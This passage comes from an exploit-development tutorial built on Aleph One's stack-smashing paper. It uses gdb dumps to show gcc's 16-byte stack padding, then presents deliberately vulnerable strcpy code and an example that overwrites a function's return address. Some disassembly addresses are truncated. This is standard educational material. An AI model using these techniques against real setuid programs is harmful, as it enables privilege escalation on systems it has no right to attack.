    word 1:   buffer1[0]  buffer1[1]  buffer1[2]  buffer1[3]
    word 2:   buffer1[4]

As you know, data of type char takes 1 byte of memory. buffer1 is allocated 5

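bytes, so it has to use two words. Of those two words only 5 bytes are actually used; the remaining 3 bytes are wasted memory that plays no part in processing the data. buffer1 therefore uses two words, and 8 bytes of memory are allocated for it. Anyone who does not understand why the table above starts at buffer1[0] is not ready to read this text.

    [ buffer2 ]
    word 1:   buffer2[0]  buffer2[1]  buffer2[2]  buffer2[3]
    word 2:   buffer2[4]  buffer2[5]  buffer2[6]  buffer2[7]
    word 3:   buffer2[8]  buffer2[9]

buffer2[10], which actually uses 10 bytes, needs three words, so 12 bytes of memory are allocated for it. With this in mind, the stack looks as follows when function() is called.

    low memory                                                                 high memory
    addresses                                                                  addresses

      buffer2      buffer1      SFP        ret        a          b          c
    [12 bytes]   [8 bytes]   [4 bytes]  [4 bytes]  [4 bytes]  [4 bytes]  [4 bytes]

    top of stack  <--------------------------------------------------  bottom of stack

The arrow in the diagram points to the left: data piles up toward the top of the stack while memory addresses decrease. As mentioned earlier, relative to the frame pointer (which points at SFP) the offsets of the local variables are negative and those of the parameters are positive. This is because the stack grows down. Think back to primary school arithmetic: with SFP as the origin at 0, the local variables on the left have negative offsets and the parameters on the right have positive offsets. Here is a perhaps childish analogy. A tree grows: the trunk grows up and the roots grow down. Memory addresses increase in the direction of the trunk,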

while the stack grows in the direction of the roots. Ordinary human thinking follows the trunk, but when talking about the stack, think upside down.

Now let us see what the material above looks like on the systems in common use today. My test system is Red Hat 8.0. The first thing to note is that the results differ by gcc version. The gcc used in Aleph One's article is earlier than 2.96. As we just saw, the amount of space reserved for local variables was easy to understand there. From gcc 2.96 on, perhaps for security reasons, the results have become that much harder to analyze. But giving up means you lack the makings of a hacker; we have to find a clue. So we will check how the gcc versions differ. First, the results on my system.

    [vangelis@localhost test]$ uname -a
    Linux localhost.localdomain #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
    [vangelis@localhost test]$ gcc -v
    gcc version (Red Hat Linux )
    [vangelis@localhost test]$ vi example1.c
    /* example1.c by Aleph One */
    void function(int a, int b, int c){
        char buffer1[5];
        char buffer2[10];
    }

    void main(){
        function(1,2,3);
    }
    ~
    ~
    [vangelis@localhost test]$ gcc -o ex ex.c
    ex.c: In function `main':
    ex.c:6: warning: return type of `main' is not `int'

    [vangelis@localhost test]$ gdb ex
    GNU gdb Red Hat Linux ( )
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x80482fc <main>:       push   %ebp
    0x80482fd <main+1>:     mov    %esp,%ebp
    0x80482ff <main+3>:     sub    $0x8,%esp
    0x <main+6>:            and    $0xfffffff0,%esp
    0x <main+9>:            mov    $0x0,%eax
    0x804830a <main+14>:    sub    %eax,%esp
    0x804830c <main+16>:    sub    $0x4,%esp
    0x804830f <main+19>:    push   $0x3
    0x <main+21>:           push   $0x2
    0x <main+23>:           push   $0x1
    0x <main+25>:           call   0x80482f4 <function>
    0x804831a <main+30>:    add    $0x10,%esp
    0x804831d <main+33>:    leave
    0x804831e <main+34>:    ret
    0x804831f <main+35>:    nop
    End of assembler dump.
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x28,%esp

    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.
    (gdb) q
    [vangelis@localhost test]$

The function part extracted with gdb looks like this:

    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x28,%esp

The assembly produced with the -S switch, however, looks like this:

    function:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $40, %esp

Comparing the two shows some differences. gdb prints the value in hexadecimal ($0x28), while the assembly code produced with -S uses decimal ($40). There is nothing strange about this, since hexadecimal 0x28 is decimal 40; only the notation differs. The other difference is that gdb shows push where the assembly listing shows pushl. This too is only a difference in notation for the same instruction, so beginners should not let it confuse them. Below is the assembly code produced with the -S switch.

    [vangelis@localhost test]$ gcc -S -o ex.s ex.c
    ex.c: In function `main':
    ex.c:6: warning: return type of `main' is not `int'
    [vangelis@localhost test]$ cat ex.s
        .file   "ex.c"
        .text
        .align 2
    .globl function

        .type
    function:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $40, %esp
        leave
        ret
    .Lfe1:
        .size   function,.Lfe1-function
    .globl main
        .align 2
        .type
    main:
        pushl   %ebp
        movl    %esp, %ebp
        subl    $8, %esp
        andl    $-16, %esp
        movl    $0, %eax
        subl    %eax, %esp
        subl    $4, %esp
        pushl   $3
        pushl   $2
        pushl   $1
        call    function
        addl    $16, %esp
        leave
        ret
    .Lfe2:
        .size   main,.Lfe2-main
        .ident  "GCC: (GNU) (Red Hat Linux )"
    [vangelis@localhost test]$
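The 20 bytes in Aleph One's listing follow from the word-rounding rule explained earlier: each buffer is rounded up to a multiple of the 4-byte word. The sketch below only reproduces that arithmetic; the helper names are hypothetical, and it deliberately does not model whatever additional alignment makes gcc 3.2 reserve 40 bytes for the same source.

```c
#include <stddef.h>

#define WORD_SIZE 4u   /* one word is 4 bytes on 32-bit x86, as in the article */

/* Round a byte count up to the next multiple of the word size. */
size_t round_up_to_word(size_t nbytes)
{
    return (nbytes + WORD_SIZE - 1) / WORD_SIZE * WORD_SIZE;
}

/* Total stack space for a set of local buffers when each one is
 * rounded up to a whole number of words (the pre-2.96 behaviour
 * described in the text). */
size_t locals_size(const size_t *sizes, size_t count)
{
    size_t total = 0;

    for (size_t i = 0; i < count; i++)
        total += round_up_to_word(sizes[i]);
    return total;
}
```

For buffer1[5] and buffer2[10] this gives 8 + 12 = 20, matching sub $20,%esp in the original article. The 40 bytes seen in the listing above therefore cannot be explained by word rounding alone.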

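The results above show that Aleph One's test result and the result on my system differ. In table form:

    System                               Source                                  Result
    Aleph One (gcc before 2.96)          void function(int a, int b, int c) {    push %ebp
                                             char buffer1[5];                    mov  %esp,%ebp
                                             char buffer2[10];                   sub  $20,%esp
                                         }
    Author's system (gcc after 2.96)     void main(){                            push %ebp
                                             function(1,2,3);                    mov  %esp,%ebp
                                         }                                       sub  $40,%esp

    Difference: the amount of memory allocated for local variables has changed.

Probably one of the biggest difficulties beginners run into is that, because systems differ, the test results in the document they are following do not match their own, and confusion follows. So why the difference? Let us briefly look at what changed before and after gcc 2.96. gcc 2.96 was first adopted in Red Hat 7.0. The gcc 2.96 installed with 7.0 had bugs, and a corrected gcc 2.96 was installed on Red Hat Linux i386. Keep in mind, though, that 2.96 and 2.97 were development versions, not official releases. Red Hat 8.0, which I am using for this text, ships version 3.2. Now look at the following test results.

    [vangelis@localhost gdb]$ vi e1.c
    void function(int a, int b, int c){
        char buffer1[5];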

        char buffer2[10];
    }

    void main(){
        function(1,2,3);
    }
    ~
    ~
    [vangelis@localhost gdb]$ gcc -o e1 e1.c
    e1.c: In function `main':
    e1.c:6: warning: return type of `main' is not `int'
    [vangelis@localhost gdb]$ gdb e1
    GNU gdb Red Hat Linux ( )
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x80482fc <main>:       push   %ebp
    0x80482fd <main+1>:     mov    %esp,%ebp
    0x80482ff <main+3>:     sub    $0x8,%esp
    0x <main+6>:            and    $0xfffffff0,%esp
    0x <main+9>:            mov    $0x0,%eax
    0x804830a <main+14>:    sub    %eax,%esp
    0x804830c <main+16>:    sub    $0x4,%esp
    0x804830f <main+19>:    push   $0x3
    0x <main+21>:           push   $0x2
    0x <main+23>:           push   $0x1
    0x <main+25>:           call   0x80482f4 <function>
    0x804831a <main+30>:    add    $0x10,%esp
    0x804831d <main+33>:    leave
    0x804831e <main+34>:    ret
    0x804831f <main+35>:    nop
    End of assembler dump.
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x28,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

    (gdb) q
    [vangelis@localhost gdb]$ vi e2.c
    void function(int a, int b, int c){
        char buffer1[1];
        char buffer2[12];
    }

    void main(){
        function(1,2,3);
    }
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x28,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

    [vangelis@localhost gdb]$ vi e3.c
    void function(int a, int b, int c){
        char buffer1[16];
        char buffer2[16];
    }

    void main(){
        function(1,2,3);
    }
    ~
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x28,%esp
    0x80482fa <function+6>:    leave

    0x80482fb <function+7>:    ret
    End of assembler dump.

    [vangelis@localhost gdb]$ vi e4.c
    void function(int a, int b, int c){
        char buffer1[17];
        char buffer2[16];
    }

    void main(){
        function(1,2,3);
    }
    ~
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x38,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

    [vangelis@localhost gdb]$ vi e5.c
    void function(int a, int b, int c){
        char buffer1[17];
        char buffer2[17];
    }

    void main(){
        function(1,2,3);
    }
    ~
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp

    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x48,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

    [vangelis@localhost gdb]$ vi e6.c
    void function(int a, int b, int c){
        char buffer1[33];
        char buffer2[25];
    }

    void main(){
        function(1,2,3);
    }
    ~
    (gdb) disas function
    Dump of assembler code for function function:
    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x58,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

    [vangelis@localhost gdb]$ vi e7.c
    void function(int a, int b, int c){
        char buffer1[49];
        char buffer2[25];
    }

    void main(){
        function(1,2,3);
    }
    ~
    (gdb) disas function
    Dump of assembler code for function function:

    0x80482f4 <function>:      push   %ebp
    0x80482f5 <function+1>:    mov    %esp,%ebp
    0x80482f7 <function+3>:    sub    $0x68,%esp
    0x80482fa <function+6>:    leave
    0x80482fb <function+7>:    ret
    End of assembler dump.

The results look a little complicated, but some regularity is visible. If we can pin that regularity down, our study becomes much easier. To find it, let us use the following simple source.

    void main()
    {
        char buffer[1];
    }

The size in char buffer[1] will be increased in steps of 4 bytes from one test to the next, because data goes into memory in units of words. Note that in the tests below the name of each executable matches the size of the buffer. The individual sources are omitted.

    [vangelis@localhost gdb]$ vi 1.c
    void main()
    {
        char buffer[1];
    }
    ~
    ~
    [vangelis@localhost gdb]$ gcc -o 1 1.c
    [vangelis@localhost gdb]$ gdb 1
    GNU gdb Red Hat Linux ( )
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are

    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x80482f4 <main>:       push   %ebp
    0x80482f5 <main+1>:     mov    %esp,%ebp
    0x80482f7 <main+3>:     sub    $0x8,%esp
    0x80482fa <main+6>:     and    $0xfffffff0,%esp
    0x80482fd <main+9>:     mov    $0x0,%eax
    0x <main+14>:           sub    %eax,%esp
    0x <main+16>:           leave
    0x <main+17>:           ret
    0x <main+18>:           nop
    0x <main+19>:           nop
    End of assembler dump.

    [vangelis@localhost gdb]$ gdb 4
    (gdb) disas main
    Dump of assembler code for function main:
    0x80482f4 <main>:       push   %ebp
    0x80482f5 <main+1>:     mov    %esp,%ebp
    0x80482f7 <main+3>:     sub    $0x8,%esp
    0x80482fa <main+6>:     and    $0xfffffff0,%esp
    0x80482fd <main+9>:     mov    $0x0,%eax
    0x <main+14>:           sub    %eax,%esp
    0x <main+16>:           leave
    0x <main+17>:           ret
    0x <main+18>:           nop
    0x <main+19>:           nop
    End of assembler dump.

    [vangelis@localhost gdb]$ gdb 5
    (gdb) disas main
    Dump of assembler code for function main:
    0x80482f4 <main>:       push   %ebp
    0x80482f5 <main+1>:     mov    %esp,%ebp
    0x80482f7 <main+3>:     sub    $0x18,%esp
    0x80482fa <main+6>:     and    $0xfffffff0,%esp
    0x80482fd <main+9>:     mov    $0x0,%eax
    0x <main+14>:           sub    %eax,%esp
    0x <main+16>:           leave

0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 8
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x18,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 12
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x18,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 16
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x18,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax

0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 17
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x28,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 20
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x28,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 24
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x28,%esp

0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 28
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x28,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 32
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x28,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 33
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp

0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x38,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

-- omitted --

[vangelis@localhost gdb]$ gdb 48
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x38,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 49
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x48,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 64
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x48,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 65
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x58,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 80
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x58,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop

0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 81
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x68,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 96
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x68,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 97
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x78,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop

0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 112
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x78,%esp
0x80482fa <main+6>: and $0xfffffff0,%esp
0x80482fd <main+9>: mov $0x0,%eax
0x <main+14>: sub %eax,%esp
0x <main+16>: leave
0x <main+17>: ret
0x <main+18>: nop
0x <main+19>: nop
End of assembler dump.

[vangelis@localhost gdb]$ gdb 113
(gdb) disas main
Dump of assembler code for function main:
0x80482f4 <main>: push %ebp
0x80482f5 <main+1>: mov %esp,%ebp
0x80482f7 <main+3>: sub $0x88,%esp
0x80482fd <main+9>: and $0xfffffff0,%esp
0x <main+12>: mov $0x0,%eax
0x <main+17>: sub %eax,%esp
0x <main+19>: leave
0x <main+20>: ret
0x <main+21>: nop
0x804830a <main+22>: nop
0x804830b <main+23>: nop
End of assembler dump.
(gdb) q
[vangelis@localhost gdb]$

For convenience, let us put the results above into a table.

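Allocation for the buffer sizes disassembled above (up to 32 bytes):

Data size (size of buffer)    Allocated (hex)    Allocated (decimal)
1                             0x8                8
4                             0x8                8
5                             0x18               24
8                             0x18               24
12                            0x18               24
16                            0x18               24
17                            0x28               40
20                            0x28               40
24                            0x28               40
28                            0x28               40
32                            0x28               40

From 1 to 16 the allocation is an irregular mix of 8 bytes and 24 bytes, but in most cases 24 bytes are allocated. The cells shaded in green in the table also have one thing in common. With that, the part we found difficult is finally resolved.

Summarizing the table: when a function is called, the space for its local variables is allocated in full 16-byte units regardless of the amount of data. For example, with gcc before 2.96 a local variable buffer[5] is given 8 bytes, because data is laid out in memory in word units, whereas with gcc 2.96 and later it is given 16 bytes. Likewise buffer[17] gets 20 bytes before 2.96 but 32 bytes afterwards. Keep this in mind when deciding how much to overwrite in an overflow attack.

Let us briefly go over Aleph One's example1.c one last time, starting from the comparison table we drew up earlier.

Source (the same in both cases):

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}

void main(){
    function(1,2,3);
}

System                            Result
Aleph One (gcc before 2.96)       push %ebp
                                  mov %esp,%ebp
                                  sub $20,%esp
Author's system (gcc 2.96+)       push %ebp
                                  mov %esp,%ebp
                                  sub $40,%esp

Difference: the amount of memory allocated for the local variables changes.

In the table, gcc before 2.96 allocates 20 bytes, which, as explained earlier, breaks down as follows.

char buffer1[5] (8 bytes) + char buffer2[10] (12 bytes) = 20 bytes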
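The two padding rules described above can be written down as a small calculation. The following is only a sketch of the rules as this article states them, not of gcc's actual allocation logic; the names round_up, local_size_word and local_size_16 are hypothetical helpers introduced for this illustration.

```c
#include <stddef.h>

/* Round n up to the next multiple of align (align must be a power of two). */
static size_t round_up(size_t n, size_t align)
{
    return (n + align - 1) & ~(align - 1);
}

/* Rule described for gcc before 2.96: pad each buffer to a 4-byte word. */
size_t local_size_word(size_t n)
{
    return round_up(n, 4);
}

/* Rule described for gcc 2.96 and later: pad each buffer to 16 bytes. */
size_t local_size_16(size_t n)
{
    return round_up(n, 16);
}
```

Calling local_size_word(5) and local_size_word(10) reproduces the 8 + 12 = 20 bytes of Aleph One's listing, and local_size_16(17) gives the 32 bytes mentioned for buffer[17]. Any extra padding the compiler adds on top of the per-buffer sizes is outside this sketch.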

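With gcc 2.96 and later, however, 40 bytes are allocated, which can be explained as follows.

char buffer1[5] (16 bytes) + char buffer2[10] (16 bytes) + dummy (8 bytes) = 40 bytes

char buffer1[5] holds 5 bytes, which is no more than 16, so a full 16 bytes are allocated. char buffer2[10] holds 10 bytes, also no more than 16, so it too gets 16 bytes. That alone would come to 32 bytes, but the test showed 40 bytes. The difference is an 8-byte dummy value. The table from the original paper that we looked at earlier therefore has to be revised as follows.

buffer2    buffer1    dummy     SFP       ret       a         b         c
16 byte    16 byte    8 byte    4 byte    4 byte    4 byte    4 byte    4 byte

Let us briefly see where the 8-byte dummy comes from. In the table above, buffer2 and buffer1 are each given 16 bytes. With gcc before 2.96 they would have received 12 bytes and 8 bytes, but gcc 2.96 and later keeps the stack aligned in 16-byte units, so each gets 16 bytes. Leaving the dummy aside, however, the distance from ret to buffer1 in the table is only 8 bytes. That would break the basic alignment rule, so an 8-byte dummy is inserted between buffer1 and sfp to preserve it.

That completes the tedious background. From here on we look at buffer overflow attacks proper.

Buffer Overflows

A buffer overflow is what happens when you try to put more data into a buffer than it can handle. It stems from a coding mistake by the programmer, and it lets an attacker execute code of the attacker's choosing. The situation in which more data can be written than a buffer can hold mostly arises when functions that do no bounds checking, such as strcpy(), are used. For example, if a buffer is sized to hold 50 bytes and strcpy() is used to fill it, then because strcpy() does no bounds checking it is possible to write more data than the buffer was declared to hold, and as a result the return address can be manipulated as well. If shellcode that spawns a shell is supplied along with the input and the manipulated return address points at that shellcode, the function will run a shell when it finishes and returns, and if the vulnerable program is setuid 0 it will be a root shell.

We have already seen how the return address can be manipulated. Now we turn to the buffer overflow technique itself, confining ourselves to Aleph One's paper: so many techniques have been published that covering them all would need a separate article. Look at the following source.

example2.c
#include <string.h>

void function(char *str){
    char buffer[16];

    strcpy(buffer, str);
}

void main(){
    char large_string[256];
    int i;

    for(i=0; i<255; i++)
        large_string[i]='A';

    function(large_string);
}

Even at a glance the source above clearly has a buffer overflow vulnerability. No programmer would write code like this; it is only a program put forward for studying overflows. Analysing a real program to find an overflow vulnerability and then exploiting it takes a good deal more dedication. As readers already know, the program above overflows because it uses strcpy(), which does no bounds checking. If strncpy() (footnote 15) were used with a count no larger than the destination buffer, the copy would be bounded and the overflow would not occur. Consider the following simple example.

#include <stdio.h>
#include <string.h>

int main ()
{
    char buf1[] = "wowhacker";
    char buf2[6];

    strncpy (buf2, buf1, 5);   /* at most 5 characters are copied */
    buf2[5] = '\0';
    puts (buf2);
    return 0;
}

Running this program prints wowha. Because the amount of data that may go into the buffer is specified, there is no risk of overflow.

Returning to Aleph One's source, running that program produces a segmentation fault. When the function is called, the stack looks roughly as follows. In today's environments a dummy value would of course sit between buffer and sfp, as we saw earlier.

15 The synopsis of strncpy() is: char * strncpy ( char * dest, const char * src, size_t num );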

Low memory address                                  High memory address

      buffer            sfp     ret     *str
      [            ]    [  ]    [  ]    [  ]

Top of stack                                        Bottom of stack

Now let us look at the source more closely. First, why does the segmentation fault occur? As we have seen several times, strcpy() copies the contents of *str (large_string[]) into buffer[] until a null character is found in the string. As the source shows, buffer[] is much smaller than *str: buffer[] is 16 bytes, and we are trying to put 256 bytes into it. This means that the bytes following the buffer on the stack, about 240 of them (Aleph One's text says 250), are all overwritten, including sfp, ret and even *str. We filled large_string with the character 'A'. The hexadecimal value of 'A' is 0x41, so the return address overwritten with 'A' becomes 0x41414141, since a return address is 4 bytes. When the function returns, it tries to read the next instruction from address 0x41414141, and that is what causes the segmentation fault.

What we have learned so far is that a buffer overflow lets us change a function's return address. When the return address changes, the program's flow of execution naturally changes too. Let us go back to example1.c, the first example we saw, and use it to look at how to manipulate the return address and execute arbitrary code. The source of example1.c is as follows.

example1.c
void function(int a, int b, int c){
    char buffer1[5];
    char buffer2[10];
}

void main(){
    function(1,2,3);
}

When function() is called, the stack looks like this.

Low memory address                                                      High memory address

buffer2      buffer1     SFP        ret        a          b          c
[12 byte]    [8 byte]    [4 byte]   [4 byte]   [4 byte]   [4 byte]   [4 byte]

Top of stack                                                            Bottom of stack

On the stack, SFP comes before buffer1, and ret comes before SFP. That puts ret 4 bytes past the end of buffer1[]. But buffer1[] is really 2 words, that is, 8 bytes, so the return address is 12 bytes from the start of buffer1[]. To alter the return address, Aleph One arranges for the assignment x=1; that follows the function call to be jumped over. To do that he adds 8 bytes to the return address. The code is as follows.

example3.c
void function(int a, int b, int c){
    char buffer1[5];
    char buffer2[10];
    int *ret;

    ret = buffer1+12;
    (*ret)+=8;
}

void main(){
    int x;

    x=0;
    function(1,2,3);
    x=1;
    printf("%d\n",x);
}

The difference between example1.c and example3.c is that example3.c adds 12 to the address of buffer1[] (ret = buffer1+12;). This new address is where the return address is stored; we saw above that the distance from buffer1 to ret is 12. We then want to skip past the assignment and go straight to the printf call. But how do we know what to add to the return address? We can find out with gdb.

[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
